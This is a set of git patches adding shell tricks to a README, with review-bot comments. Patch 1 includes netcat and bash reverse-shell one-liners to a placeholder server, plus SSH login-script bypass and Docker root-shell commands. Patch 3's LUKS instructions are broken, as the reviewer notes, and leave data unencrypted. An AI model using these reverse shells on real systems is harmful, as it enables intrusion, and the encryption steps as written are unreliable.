From 6bcc53e51628a4652c489758dae66abd18d92875 Mon Sep 17 00:00:00 2001 From: "[ virtual snow ]" <59495119+virtualsnow@users.noreply.github.com> Date: Fri, 24 Jan 2020 00:26:18 -0800 Subject: [PATCH 1/3] Update README.md --- README.md | 70 +++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 70 insertions(+) diff --git a/README.md b/README.md index 8fc0dbb..a9178b1 100644 --- a/README.md +++ b/README.md @@ -253,6 +253,76 @@ Make a noise (BING) when anyone tries to SSH into our system (could be an admin! # tcpdump -nlq "tcp[13] == 2 and dst port 22" | while read x; do echo "${x}"; echo -en \\a; done ``` +**20. Generate quick random hex** + +Good for quick passwords without human element. + +``` +$ openssl rand -base64 24 +``` + +**21. Reverse shell with nc** + +First listen for a shell on your server. + +``` +$ nc -lvp 666 +``` + +Reverse connect with netcat. + +``` +$ nc -e /bin/sh yourserver.com 666 +``` + +Reverse connect with netcat built without `-e` flag. + +``` +$ mkfifo /tmp/x;cat /tmp/x|/bin/sh -i 2>&1|nc yourserver.com 666 >/tmp/x +``` + +**22. Reverse shell with bash** + +Replace `xx.xx.xx.xx` with your server ip. + +``` +$ bash -i >& /dev/tcp/xx.xx.xx.xx/666 0>&1 +``` + +**23. SSH with different shell + +Bypass events that exist in login scripts such as `.profile` and `.bashrc`. + +``` +$ ssh user@server sh + +``` + +**24. Strip SSH key comment field. + +`ssh-keygen` automatically fills this field with local user and host, and can be recorded during connection. + +Command strips comment field from both private and public keys. + +``` +$ ssh-keygen -c -C "redacted" -f ~/.ssh/id_rsa +``` + +**25. Get a root shell in Docker container. + +If the container is already running: + +``` +$ docker exec -it --user root /bin/bash +``` + +If the container is not running: + +``` +$ docker run -it --user root --entrypoint /bin/bash +``` + + -------------------------------------------------------------------------- Shoutz: ADM 
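Review bot: item 20's heading promises "random hex" but `openssl rand -base64 24` emits base64; either retitle the item or use `openssl rand -hex 24`. Item 25's two commands are missing their required positional argument and fail as written: `docker exec -it --user root <container> /bin/bash` needs the container name or ID, and `docker run -it --user root --entrypoint /bin/bash <image>` needs the image. Item 24 overstates the exposure: the key comment lives only in the local key files (and in any `authorized_keys` it is pasted into); it is not sent to the server during public-key authentication, and `-C "redacted"` replaces the comment rather than stripping it, so the wording should say "replace" or the command should use `-C ""`. Minor: the bold markers on items 23 to 25 are never closed, and the fence for item 23 carries a stray blank line before the closing backticks.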
From 2648e14515d0e77d8ad67a0950107be9b1a01bc5 Mon Sep 17 00:00:00 2001 From: "[ virtual snow ]" <59495119+virtualsnow@users.noreply.github.com> Date: Fri, 24 Jan 2020 00:27:49 -0800 Subject: [PATCH 2/3] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index a9178b1..2f3391b 100644 --- a/README.md +++ b/README.md @@ -289,7 +289,7 @@ Replace `xx.xx.xx.xx` with your server ip. $ bash -i >& /dev/tcp/xx.xx.xx.xx/666 0>&1 ``` -**23. SSH with different shell +**23. SSH with different shell** Bypass events that exist in login scripts such as `.profile` and `.bashrc`. @@ -298,7 +298,7 @@ $ ssh user@server sh ``` -**24. Strip SSH key comment field. +**24. Strip SSH key comment field.** `ssh-keygen` automatically fills this field with local user and host, and can be recorded during connection. @@ -308,7 +308,7 @@ Command strips comment field from both private and public keys. $ ssh-keygen -c -C "redacted" -f ~/.ssh/id_rsa ``` -**25. Get a root shell in Docker container. +**25. Get a root shell in Docker container.** If the container is already running: From bf16cccee67d078c40b1f2c86973d8fd4ed66bde Mon Sep 17 00:00:00 2001 From: "[ virtual snow ]" <59495119+virtualsnow@users.noreply.github.com> Date: Fri, 24 Jan 2020 00:54:47 -0800 Subject: [PATCH 3/3] file luks tricks --- README.md | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/README.md b/README.md index 2f3391b..08b2cbf 100644 --- a/README.md +++ b/README.md 
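Review bot: the three hunks here only close the bold markers that the first patch left open on items 23 to 25 (`**23. SSH with different shell` becoming `**23. SSH with different shell**`, and likewise for 24 and 25); they belong squashed into the first patch rather than shipped as a separate commit under the same generic "Update README.md" subject. No functional change otherwise.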
@@ -322,6 +322,34 @@ If the container is not running: $ docker run -it --user root --entrypoint /bin/bash ``` +**26. Linux transportable encrypted filesystems.** + +Like truecrypt but better. You may need to `losetup -f` to get a loop device. + +Make a junk file, here 256MB is used, encrypt, and partition. You will be prompted for a password. + +``` +$ dd if=/dev/urandom of=/tmp/crypted bs=1M count=256 iflag=fullblock +$ cryptsetup luksFormat /tmp/crypted +$ mkfs.ext3 /tmp/crypted +``` + +Mount: + +``` +# losetup /dev/loop0 /tmp/crypted +# cryptsetup open /dev/loop0 crypted +# mount -t ext3 /dev/mapper/crypted /mnt/crypted +``` + +Store data in `/mnt/crypted`, then unmount: + +``` +# umount /mnt/crypted +# cryptsetup close crypted +# losetup -d /dev/loop0 +``` + --------------------------------------------------------------------------
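Review bot: the setup sequence in item 26 is wrong: `mkfs.ext3 /tmp/crypted` runs against the container file immediately after `cryptsetup luksFormat`, which overwrites the LUKS header just written and leaves a plaintext ext3 filesystem, so the later `cryptsetup open` will not find a LUKS volume and the data is never encrypted. The filesystem must be created on the opened mapping: `cryptsetup luksFormat /tmp/crypted`, then `cryptsetup open` on the loop device as in the mount block, then `mkfs.ext3 /dev/mapper/crypted`, and only then `mount`. Also, the text tells the reader to run `losetup -f` to find a free loop device while the mount and teardown blocks hardcode `/dev/loop0`; either capture the device name (`LOOP=$(losetup -f --show /tmp/crypted)`) and use it in all three blocks, or say explicitly that the device name may differ.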